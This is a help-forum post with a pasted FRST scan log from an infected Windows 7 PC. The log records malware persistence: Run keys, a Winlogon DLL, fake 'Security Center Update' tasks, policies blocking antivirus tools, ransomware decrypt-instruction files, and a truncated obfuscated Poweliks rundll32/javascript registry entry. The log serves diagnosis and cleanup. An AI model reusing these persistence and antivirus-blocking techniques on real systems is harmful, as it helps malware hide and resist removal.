Thank you! Here are both logs:
FRST:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 07-12-2014 02
Ran by Glynnda (administrator) on GLYNNDA-HP on 07-12-2014 20:16:51
Running from C:\Users\Glynnda\Desktop
Loaded Profile: Glynnda (Available profiles: Glynnda)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Andrea Electronics Corporation) C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe
(Advanced Micro Devices, Inc.) C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe
(Hewlett-Packard Company) C:\Program Files\Hewlett-Packard\HP Client Services\HPClientServices.exe
(Support.com, Inc.) C:\Program Files (x86)\Office Depot PC Support Agent\esService.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftvsa.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Application Virtualization Client\sftlist.exe
(Microsoft Corp.) C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVCM.EXE
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\HP Odometer\hpsysdrv.exe
(Eastman Kodak Company) C:\Windows\System32\spool\drivers\x64\3\EKIJ5000MUI.exe
(Hewlett-Packard) C:\Program Files (x86)\Hp\HP Software Update\hpwuschd2.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(Microsoft Corporation) C:\Program Files (x86)\Common Files\microsoft shared\Virtualization Handler\CVHSVC.EXE
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(CyberLink) C:\Program Files (x86)\Cyberlink\YouCam\YCMMirage.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe
(Hewlett-Packard) C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\HPTouchSmartSyncCalReminderApp.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSA_Service.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\SysWOW64\WerFault.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\rundll32.exe
==================== Registry (Whitelisted) ==================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7461480 2011-09-08] (Realtek Semiconductor)
HKLM\...\Run: [hpsysdrv] => c:\program files (x86)\hewlett-packard\HP odometer\hpsysdrv.exe [62768 2008-11-20] (Hewlett-Packard)
HKLM\...\Run: [EKIJ5000StatusMonitor] => C:\Windows\system32\spool\DRIVERS\x64\3\EKIJ5000MUI.exe [2045440 2010-09-02] (Eastman Kodak Company)
HKLM\...\Run: [Emzuunok] => C:\Users\Glynnda\AppData\Roaming\Azcaoh\xyheepe.exe [284347 2013-08-16] (Anubisel Corporatu)
HKLM-x32\...\Run: [HP Software Update] => c:\Program Files (x86)\HP\HP Software Update\HPWuSchd2.exe [49208 2011-05-10] (Hewlett-Packard)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959904 2013-11-21] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\amd64\CLIStart.exe [767200 2014-09-15] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [Emzuunok] => C:\Users\Glynnda\AppData\Roaming\Azcaoh\xyheepe.exe [284347 2013-08-16] (Anubisel Corporatu)
HKLM-x32\...\Run: [EKIJ5000StatusMonitor] => C:\Windows\System32\spool\drivers\x64\3\EKIJ5000MUI.exe
HKLM\...\RunOnce: [NCPluginUpdater] => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\NCPluginUpdater.exe [21720 2014-11-11] (Hewlett-Packard)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\McAfee <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files (x86)\Malwarebytes' Anti-Malware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Program Files (x86)\Common Files\Symantec Shared <====== ATTENTION
Winlogon\Notify\oxnmkag-x32: C:\Users\Glynnda\AppData\Local\oxnmkag.dll ()
HKLM\...\Policies\Explorer: [NoFolderOptions] 0
HKLM\...\Policies\Explorer: [NoControlPanel] 0
HKU\S-1-5-21-3098917091-2276340468-633939820-1000\...\Run: [Emzuunok] => C:\Users\Glynnda\AppData\Roaming\Azcaoh\xyheepe.exe [284347 2013-08-16] (Anubisel Corporatu)
HKU\S-1-5-21-3098917091-2276340468-633939820-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
HKU\S-1-5-21-3098917091-2276340468-633939820-1000\Software\Microsoft\Internet Explorer\Main,Start Page =
http://yahoo.com/
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files\AMD\SteadyVideo\SteadyVideo.dll (Advanced Micro Devices)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
BHO: No Name -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> No File
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll (Hewlett-Packard)
BHO-x32: SteadyVideoBHO Class -> {6C680BAE-655C-4E3D-8FC4-E6A520C3D928} -> C:\Program Files (x86)\amd\SteadyVideo\SteadyVideo.dll (Advanced Micro Devices)
BHO-x32: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO-x32: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO-x32: No Name -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} -> No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll (Hewlett-Packard)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_64.dll (Google Inc.)
Toolbar: HKLM-x32 - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files (x86)\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
Toolbar: HKU\S-1-5-21-3098917091-2276340468-633939820-1000 -> No Name - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - No File
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - No File
Handler-x32: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\Program Files (x86)\Common Files\Skype\Skype4COM.dll (Skype Technologies)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - No File
Filter: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter-x32: video/mp4 - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files\AMD\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Filter-x32: video/x-flv - {20C75730-7C25-476B-95DC-C65810F9E489} - C:\Program Files (x86)\amd\SteadyVideo\VideoMIMEFilter.dll (Advanced Micro Devices)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 71.10.216.1 71.10.216.2
Tcpip\..\Interfaces\{21C27A73-102E-4675-A881-104356039D20}: [NameServer] 8.8.8.8,8.8.8.8
Tcpip\..\Interfaces\{A4A3B9A4-17FF-4F63-B3B7-78293B1420E5}: [NameServer] 8.8.8.8,8.8.8.8
FireFox:
========
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL No File
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.30514.0\npctrl.dll ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3538.0513 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.25.11\npGoogleUpdate3.dll (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor
FF HKLM-x32\...\Thunderbird\Extensions: [
[email protected]] - C:\Program Files\McAfee\MSK
Chrome:
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR DefaultSearchKeyword: Default -> mcafee
CHR DefaultSuggestURL: Default ->
CHR Profile: C:\Users\Glynnda\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Glynnda\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-07-28]
CHR Extension: (SiteAdvisor) - C:\Users\Glynnda\AppData\Local\Google\Chrome\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2012-08-28]
CHR Extension: (Google Wallet) - C:\Users\Glynnda\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-06-28]
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [Not Found]
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - No Path
==================== Services (Whitelisted) =================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
R2 AMD FUEL Service; C:\Program Files\ATI Technologies\ATI.ACE\Fuel\Fuel.Service.exe [344064 2014-09-15] (Advanced Micro Devices, Inc.) [File not signed]
R2 CalendarSynchService; C:\Program Files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [16384 2011-08-16] (Hewlett-Packard) [File not signed]
R2 HP Support Assistant Service; C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [92160 2013-11-04] (Hewlett-Packard Company) [File not signed]
R2 Office Depot PC Support Agent; C:\Program Files (x86)\Office Depot PC Support Agent\esService.exe [1009752 2014-10-17] (Support.com, Inc.)
S2 HomeNetSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S2 McAPExe; "C:\Program Files\McAfee\MSC\McAPExe.exe" [X]
S2 mcpltsvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S2 mfecore; C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe [X]
==================== Drivers (Whitelisted) ====================
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [197704 2013-09-23] (McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [445512 2014-08-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [96592 2014-08-20] (McAfee, Inc.)
S3 ssmirrdr; C:\Windows\System32\DRIVERS\ssmirrdr.sys [10112 2011-03-14] (support.com, Inc)
==================== NetSvcs (Whitelisted) ===================
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
==================== One Month Created Files and Folders ========
(If an entry is included in the fixlist, the file\folder will be moved.)
2014-12-07 20:16 - 2014-12-07 20:21 - 00017912 _____ () C:\Users\Glynnda\Desktop\FRST.txt
2014-12-07 20:16 - 2014-12-07 20:17 - 00000000 ____D () C:\FRST
2014-12-07 20:14 - 2014-12-07 20:14 - 02119680 _____ (Farbar) C:\Users\Glynnda\Desktop\FRST64.exe
2014-12-07 17:18 - 2014-12-07 17:18 - 00067530 _____ () C:\Users\Glynnda\Downloads\Extras.Txt
2014-12-07 16:10 - 2014-12-07 16:10 - 00102122 _____ () C:\Users\Glynnda\Downloads\OTL.Txt
2014-12-07 15:33 - 2014-12-07 15:33 - 00003198 _____ () C:\Windows\System32\Tasks\HPCeeScheduleForGlynnda
2014-12-07 15:33 - 2014-12-07 15:33 - 00000340 _____ () C:\Windows\Tasks\HPCeeScheduleForGlynnda.job
2014-12-07 14:58 - 2014-12-07 14:58 - 00602112 _____ (OldTimer Tools) C:\Users\Glynnda\Downloads\OTL.exe
2014-12-02 20:59 - 2014-12-02 21:00 - 20447072 _____ (Malwarebytes Corporation ) C:\Users\Glynnda\Downloads\mbam-setup-2.0.4.1028.exe
2014-11-30 09:41 - 2014-11-30 09:41 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\Windows Live
2014-11-30 09:40 - 2014-11-30 09:41 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\{AD135674-8893-46A9-89DE-D377D48D249C}
2014-11-30 09:26 - 2014-11-30 09:26 - 00021527 _____ () C:\Users\Glynnda\Desktop\Office Depot Work Order 0059611525985 Ticket 27916097 Receipt.mht
2014-11-27 19:51 - 2014-11-27 19:51 - 00000000 ____D () C:\Users\Default\AppData\Roaming\Adobe
2014-11-27 19:51 - 2014-11-27 19:51 - 00000000 ____D () C:\Users\Default User\AppData\Roaming\Adobe
2014-11-27 19:49 - 2014-11-27 19:49 - 00000000 ____D () C:\Windows\system32\%LOCALAPPDATA%
2014-11-27 19:45 - 2014-11-27 19:45 - 00000026 _____ () C:\Windows\Zone.Identifier
2014-11-26 12:38 - 2014-11-26 12:38 - 01960688 _____ () C:\Users\Glynnda\Downloads\Nexus (3).com
2014-11-26 12:37 - 2014-11-26 12:37 - 01960688 _____ () C:\Users\Glynnda\Downloads\Nexus (2).com
2014-11-26 08:38 - 2014-11-26 08:38 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\AMD
2014-11-26 08:38 - 2014-11-26 08:38 - 00000000 ____D () C:\ProgramData\ATI
2014-11-26 08:01 - 2014-11-26 08:01 - 00000000 ____D () C:\ProgramData\YowaCuxa
2014-11-26 08:00 - 2014-11-26 08:00 - 00000000 ____D () C:\ProgramData\WuyoJuwz
2014-11-25 17:19 - 2014-11-25 17:19 - 00000000 ____D () C:\Program Files (x86)\AMD AVT
2014-11-25 17:18 - 2014-11-25 17:18 - 00000000 ____D () C:\Program Files (x86)\AMD
2014-11-25 17:17 - 2014-11-25 17:17 - 00061880 _____ () C:\Windows\SysWOW64\CCCInstall_201411251717104556.log
2014-11-25 17:08 - 2014-11-25 17:08 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AMD Catalyst Control Center
2014-11-25 16:58 - 2014-11-25 17:20 - 00000000 ____D () C:\ProgramData\AMD
2014-11-25 16:28 - 2014-11-25 17:18 - 00000000 ____D () C:\Program Files\AMD
2014-11-25 16:05 - 2014-11-25 16:19 - 00000000 ____D () C:\ProgramData\Package Cache
2014-11-25 15:57 - 2014-11-25 17:06 - 00000000 ____D () C:\Program Files\ATI Technologies
2014-11-25 15:49 - 2014-11-28 18:52 - 00000812 _____ () C:\Windows\Tasks\Security Center Update - 1697682034.job
2014-11-25 15:49 - 2014-11-26 19:04 - 00003826 _____ () C:\Windows\System32\Tasks\Security Center Update - 1697682034
2014-11-25 15:49 - 2014-11-25 15:49 - 00000761 _____ () C:\Windows\system32\Drivers\etc\hosts.txt
2014-11-25 15:49 - 2014-11-25 15:49 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Daikequ
2014-11-25 15:48 - 2014-11-28 18:52 - 00000816 _____ () C:\Windows\Tasks\Security Center Update - 605811440.job
2014-11-25 15:48 - 2014-11-28 18:52 - 00000816 _____ () C:\Windows\Tasks\Security Center Update - 1331730204.job
2014-11-25 15:48 - 2014-11-28 18:52 - 00000814 _____ () C:\Windows\Tasks\Security Center Update - 1079130923.job
2014-11-25 15:48 - 2014-11-28 18:52 - 00000812 _____ () C:\Windows\Tasks\Security Center Update - 1468541840.job
2014-11-25 15:48 - 2014-11-28 18:52 - 00000808 _____ () C:\Windows\Tasks\Security Center Update - 148162692.job
2014-11-25 15:48 - 2014-11-26 19:10 - 00000820 _____ () C:\Windows\Tasks\Security Center Update - 2418676004.job
2014-11-25 15:48 - 2014-11-26 19:04 - 00003834 _____ () C:\Windows\System32\Tasks\Security Center Update - 2418676004
2014-11-25 15:48 - 2014-11-26 19:04 - 00003830 _____ () C:\Windows\System32\Tasks\Security Center Update - 605811440
2014-11-25 15:48 - 2014-11-26 19:03 - 00003830 _____ () C:\Windows\System32\Tasks\Security Center Update - 1331730204
2014-11-25 15:48 - 2014-11-26 19:03 - 00003828 _____ () C:\Windows\System32\Tasks\Security Center Update - 1079130923
2014-11-25 15:48 - 2014-11-26 19:03 - 00003826 _____ () C:\Windows\System32\Tasks\Security Center Update - 1468541840
2014-11-25 15:48 - 2014-11-26 19:03 - 00003822 _____ () C:\Windows\System32\Tasks\Security Center Update - 148162692
2014-11-25 15:48 - 2014-11-25 15:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Ukseusv
2014-11-25 15:48 - 2014-11-25 15:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Nuvimefo
2014-11-25 15:48 - 2014-11-25 15:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Dikiudaz
2014-11-25 15:48 - 2014-11-25 15:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Cugyluwy
2014-11-25 15:48 - 2014-11-25 15:48 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Arulgyi
2014-11-25 15:47 - 2014-11-28 18:52 - 00000808 _____ () C:\Windows\Tasks\Security Center Update - 859257726.job
2014-11-25 15:47 - 2014-11-28 18:52 - 00000808 _____ () C:\Windows\Tasks\Security Center Update - 1571542829.job
2014-11-25 15:47 - 2014-11-26 19:04 - 00003822 _____ () C:\Windows\System32\Tasks\Security Center Update - 859257726
2014-11-25 15:47 - 2014-11-26 19:03 - 00003822 _____ () C:\Windows\System32\Tasks\Security Center Update - 1571542829
2014-11-25 15:47 - 2014-11-25 15:47 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Wyxylo
2014-11-25 15:47 - 2014-11-25 15:47 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Voveif
2014-11-25 15:47 - 2014-11-25 15:47 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Ovuzso
2014-11-25 15:47 - 2014-11-25 15:47 - 00000000 ____D () C:\AMD
2014-11-25 15:43 - 2014-11-25 15:43 - 00023552 _____ () C:\Users\Glynnda\AppData\Local\oxnlwag.dll
2014-11-25 15:43 - 2014-11-25 15:43 - 00000000 ____D () C:\ProgramData\ZufguQwalu
2014-11-25 15:43 - 2014-11-25 15:43 - 00000000 ____D () C:\ProgramData\JeniJpidg
2014-11-25 00:27 - 2014-11-25 00:27 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ShopAtHome.com Helper
2014-11-24 22:58 - 2014-11-28 18:52 - 00000812 _____ () C:\Windows\Tasks\Security Center Update - 713791217.job
2014-11-24 22:58 - 2014-11-28 18:52 - 00000808 _____ () C:\Windows\Tasks\Security Center Update - 2593297739.job
2014-11-24 22:58 - 2014-11-26 19:04 - 00003826 _____ () C:\Windows\System32\Tasks\Security Center Update - 713791217
2014-11-24 22:58 - 2014-11-26 19:04 - 00003822 _____ () C:\Windows\System32\Tasks\Security Center Update - 2593297739
2014-11-24 22:58 - 2014-11-24 22:58 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Sukamo
2014-11-24 22:58 - 2014-11-24 22:58 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Abizehd
2014-11-24 22:57 - 2014-11-28 18:52 - 00000816 _____ () C:\Windows\Tasks\Security Center Update - 399393453.job
2014-11-24 22:57 - 2014-11-28 18:52 - 00000816 _____ () C:\Windows\Tasks\Security Center Update - 193677934.job
2014-11-24 22:57 - 2014-11-26 19:04 - 00003830 _____ () C:\Windows\System32\Tasks\Security Center Update - 399393453
2014-11-24 22:57 - 2014-11-26 19:04 - 00003830 _____ () C:\Windows\System32\Tasks\Security Center Update - 193677934
2014-11-24 22:57 - 2014-11-24 22:57 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Toepexy
2014-11-24 22:57 - 2014-11-24 22:57 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Ichateg
2014-11-24 22:56 - 2014-11-28 18:52 - 00000812 _____ () C:\Windows\Tasks\Security Center Update - 3166402688.job
2014-11-24 22:56 - 2014-11-26 19:04 - 00003826 _____ () C:\Windows\System32\Tasks\Security Center Update - 3166402688
2014-11-24 22:56 - 2014-11-24 22:56 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Azcaoh
2014-11-24 22:52 - 2014-11-24 22:52 - 00000000 ____D () C:\ProgramData\PupjiRucve
2014-11-24 22:45 - 2014-11-24 22:45 - 00000000 ____D () C:\ProgramData\BabyUrmin
2014-11-24 22:44 - 2014-11-24 22:44 - 00023552 _____ () C:\Users\Glynnda\AppData\Local\oxnmkag.dll
2014-11-24 22:44 - 2014-11-24 22:44 - 00000000 __SHD () C:\Windows\system32\%APPDATA%
2014-11-24 22:44 - 2014-11-24 22:44 - 00000000 ____D () C:\ProgramData\CosePpogl
2014-11-24 14:45 - 2014-11-24 14:45 - 00001071 _____ () C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2014-11-24 14:45 - 2014-11-24 14:45 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Malwarebytes
2014-11-24 14:45 - 2014-11-24 14:45 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes' Anti-Malware
2014-11-24 14:45 - 2014-11-24 14:45 - 00000000 ____D () C:\ProgramData\Malwarebytes
2014-11-24 14:45 - 2014-11-24 14:45 - 00000000 ____D () C:\Program Files (x86)\Malwarebytes' Anti-Malware
2014-11-24 14:45 - 2013-04-04 14:50 - 00025928 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2014-11-24 12:10 - 2014-11-24 12:13 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\smartmontools
2014-11-24 11:09 - 2014-11-24 11:09 - 01960688 _____ () C:\Users\Glynnda\Downloads\Nexus (1).com
2014-11-24 11:08 - 2014-11-24 11:08 - 01960688 _____ () C:\Users\Glynnda\Downloads\Nexus.com
2014-11-22 20:38 - 2014-11-24 15:06 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Ogoxytp
2014-11-22 20:38 - 2014-11-22 20:38 - 00003828 _____ () C:\Windows\System32\Tasks\Security Center Update - 1752710425
2014-11-22 20:33 - 2014-11-22 20:33 - 00000000 ____D () C:\ProgramData\DocohOmpof
2014-11-22 16:00 - 2014-11-22 16:00 - 00002226 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Office Depot PC Support Agent.lnk
2014-11-22 16:00 - 2014-11-22 16:00 - 00002214 _____ () C:\Users\Public\Desktop\Office Depot PC Support Agent.lnk
2014-11-22 15:59 - 2014-11-22 18:05 - 00000000 ____D () C:\Program Files (x86)\Office Depot PC Support Agent
2014-11-22 15:58 - 2014-11-22 15:58 - 08041120 _____ () C:\Users\Glynnda\Downloads\Office_Depot_PC_SupportAgent.exe
2014-11-21 15:39 - 2014-11-21 16:12 - 00000000 ____D () C:\Users\Glynnda\AppData\Local\{ECEAA633-13D5-4D92-9B9C-93779D60BC4C}
2014-11-20 16:51 - 2014-11-20 18:13 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Yrybmig
2014-11-20 16:51 - 2014-11-20 16:51 - 00003824 _____ () C:\Windows\System32\Tasks\Security Center Update - 3161201767
2014-11-20 16:46 - 2014-11-20 16:46 - 00000000 ____D () C:\ProgramData\WuvuBucfi
2014-11-20 16:24 - 2014-11-24 15:06 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\FrameworkUpdate
2014-11-19 17:46 - 2014-11-20 18:00 - 00000000 ___HD () C:\ProgramData\{9A88E103-A20A-4EA5-8636-C73B709A5BF8}
2014-11-15 18:19 - 2014-11-15 18:20 - 00000000 ____D () C:\Users\Glynnda\AppData\Roaming\Devuta
2014-11-14 16:17 - 2014-11-25 14:51 - 00000000 ____D () C:\Windows\Minidump
2014-11-13 10:44 - 2014-12-07 19:49 - 00000898 _____ () C:\Windows\Tasks\GoogleUpdateTaskMachineUA1cfff61ac267ea.job
2014-11-13 10:44 - 2014-11-13 10:44 - 00003894 _____ () C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1cfff61ac267ea
2014-11-12 17:20 - 2014-11-12 17:20 - 00004214 _____ () C:\Users\Glynnda\DECRYPT_INSTRUCTION.TXT
2014-11-12 17:20 - 2014-11-12 17:20 - 00004214 _____ () C:\Users\Glynnda\AppData\Local\DECRYPT_INSTRUCTION.TXT
2014-11-12 17:20 - 2014-11-12 17:20 - 00004214 _____ () C:\Users\Glynnda\AppData\DECRYPT_INSTRUCTION.TXT
2014-11-12 15:11 - 2014-11-12 15:11 - 00000000 __SHD () C:\Users\Glynnda\AppData\Local\EmieBrowserModeList
2014-11-12 10:10 - 2014-11-07 13:49 - 00388272 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2014-11-12 10:10 - 2014-11-07 13:23 - 00341168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2014-11-12 10:10 - 2014-11-05 22:04 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2014-11-12 10:10 - 2014-11-05 22:03 - 25110016 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2014-11-12 10:10 - 2014-11-05 22:03 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
